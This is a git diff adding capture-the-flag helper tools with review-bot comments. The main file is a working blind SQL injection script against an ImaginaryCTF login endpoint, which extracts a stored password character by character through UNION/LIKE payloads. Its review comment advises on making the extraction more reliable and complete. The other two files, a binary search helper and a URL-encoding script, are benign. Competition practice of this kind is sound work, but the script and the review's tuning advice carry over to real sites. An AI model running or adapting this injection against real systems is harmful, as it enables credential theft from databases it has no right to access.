-rwxr-xr-xtemplates/sqlnameoracle.py35
-rw-r--r--tools/bsearch.py44
-rwxr-xr-xtools/urlencode8
3 files changed, 87 insertions, 0 deletions
diff --git a/templates/sqlnameoracle.py b/templates/sqlnameoracle.py
new file mode 100755
index 0000000..cec6d98
--- /dev/null
+++ b/templates/sqlnameoracle.py
@@ -0,0 +1,35 @@
+#!/usr/bin/env python3
+
+import string
+import requests
+
+url = "https://awkward-bypass.chal.imaginaryctf.org/user"
+
+base = '\' UNION SELECT username, NULL FROM users WHERE '
+#base += 'username LIKE \''
+base += 'password LIKE \''
+tail = '%\' ESCAPE \'!\' --'
+soln = ''
+
+while True :
+ found = False
+ for c in string.printable[:95]:
+ ch = c
+ if ch in '%[]^-!':
+ continue
+ if ch == '_':
+ ch = '!_'
+ test = soln + ch
+ payload = base + test + tail
+ code = 400
+ while code != 200:
+ r = requests.post(url,data={'username':payload,'password':'test'})
+ code = r.status_code
+ log = soln+c
+ print(log+": " if "Error" in r.text else log+": ***********")
+ if not "Error" in r.text :
+ found = True
+ soln += c
+ break
+ if not found:
+ break
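Review bot: The retry loop at `while code != 200:` has no cap, no delay and no exception handling, so a persistent non-200 (a rate-limit or WAF response, for instance) makes the script hammer the target indefinitely, and a single connection error raises out of the loop and discards the recovered `soln`. Bounding it, e.g. `for attempt in range(5):` with a `time.sleep(1)` before each retry and a `try`/`except requests.RequestException`, keeps the oracle polite and lets you resume from the last printed prefix. The character filter also drops `%` and `!` outright even though the query already declares `ESCAPE '!'`, so a value containing either can never be recovered; mapping them to `!%` and `!!` the same way `_` is mapped to `!_` fixes that, and `'` would need doubling to `''` rather than being sent raw, where it just breaks the query and reads as "no match". Finally, `LIKE` is case-insensitive on several backends, and since `string.printable` lists lowercase before uppercase the oracle will accept the lowercase letter first, so the recovered value should be confirmed with an exact, case-sensitive comparison before it is trusted.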
diff --git a/tools/bsearch.py b/tools/bsearch.py
new file mode 100644
index 0000000..1c92343
--- /dev/null
+++ b/tools/bsearch.py
@@ -0,0 +1,44 @@
+#binary search
+#searches for an s in i that satisfies x == f(i[s])
+#i = iterable
+#f = function to call on each element of i
+#x = value to search for
+#start = offset into iterable to start
+#end = offset into iterable to end
+#if it finds a match, it returns a tuple of (s,i[s],f(i[s]))
+#if it does not find a match, it returns (-1,None,None)
+def bsearch(i,f,x,start=0,end=-1):
+ if end == -1:
+ end = len(i)-1
+ #s = _bsearch(i,f,start,end,x)
+ s = _bsearch2(i,f,start,end,x)
+ return (s,i[s],f(i[s])) if s != -1 else (s,None,None)
+
+#recursive
+def _bsearch(i,f,lo,hi,x):
+ if hi >= lo:
+ md = (hi+lo)//2
+ a = f(i[md])
+ if a == x:
+ return md
+ elif a > x:
+ return _bsearch(i,f,lo,md-1,x)
+ else:
+ return _bsearch(i,f,md+1,hi,x)
+ else:
+ return -1
+
+#loop
+def _bsearch2(i,f,lo,hi,x):
+ while True:
+ if hi >= lo:
+ md = (hi+lo)//2
+ a = f(i[md])
+ if a == x:
+ return md
+ elif a > x:
+ hi = md-1
+ else:
+ lo = md+1
+ else:
+ return -1
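Review bot: The header comment never states the precondition the search depends on: `f(i[k])` must be non-decreasing in `k` over `[start, end]` and its values must be orderable against `x` (see the `elif a > x:` branches), otherwise a value that is present is reported as `-1`. I would add `#precondition: f(i[k]) must be non-decreasing over [start, end]; otherwise a present value may be reported as -1` beneath the existing header, and note that `i` must support `len()` and indexing, not merely iteration. The `end=-1` default is silently treated as `len(i)-1`, so a caller cannot pass an explicit end of -1, and out-of-range `start`/`end` go straight to `i[md]` and raise `IndexError` rather than returning the documented `(-1,None,None)`; a one-line note such as `#end=-1 means the last element; start/end are not range-checked` would make that explicit. The recursive `_bsearch` is kept next to its commented-out call — either document it as the reference implementation or drop it so readers do not have to work out which one is live.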
diff --git a/tools/urlencode b/tools/urlencode
new file mode 100755
index 0000000..7924db9
--- /dev/null
+++ b/tools/urlencode
@@ -0,0 +1,8 @@
+#!/bin/bash
+read foo
+if [[ $* == -d ]]
+then
+perl -MURI::Escape -e 'print uri_unescape($ARGV[0])' $foo
+else
+perl -MURI::Escape -e 'print uri_escape($ARGV[0])' $foo
+fi
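Review bot: `read foo` followed by an unquoted `$foo` on both perl lines subjects the input to word splitting and pathname expansion, so `a b` encodes only `a`, a `*` or `?` in the input can be replaced by matching filenames from the current directory, and `read` without `-r` strips backslashes — exactly the characters a URL encoder exists to handle. Use `IFS= read -r foo` and pass `"$foo"` (quoted) to perl in both branches; since the value travels through `$ARGV[0]` rather than being interpolated into the `-e` program, that is the only change needed. With the argument quoted, an empty or whitespace-only line also still reaches `uri_escape` instead of leaving `$ARGV[0]` undefined.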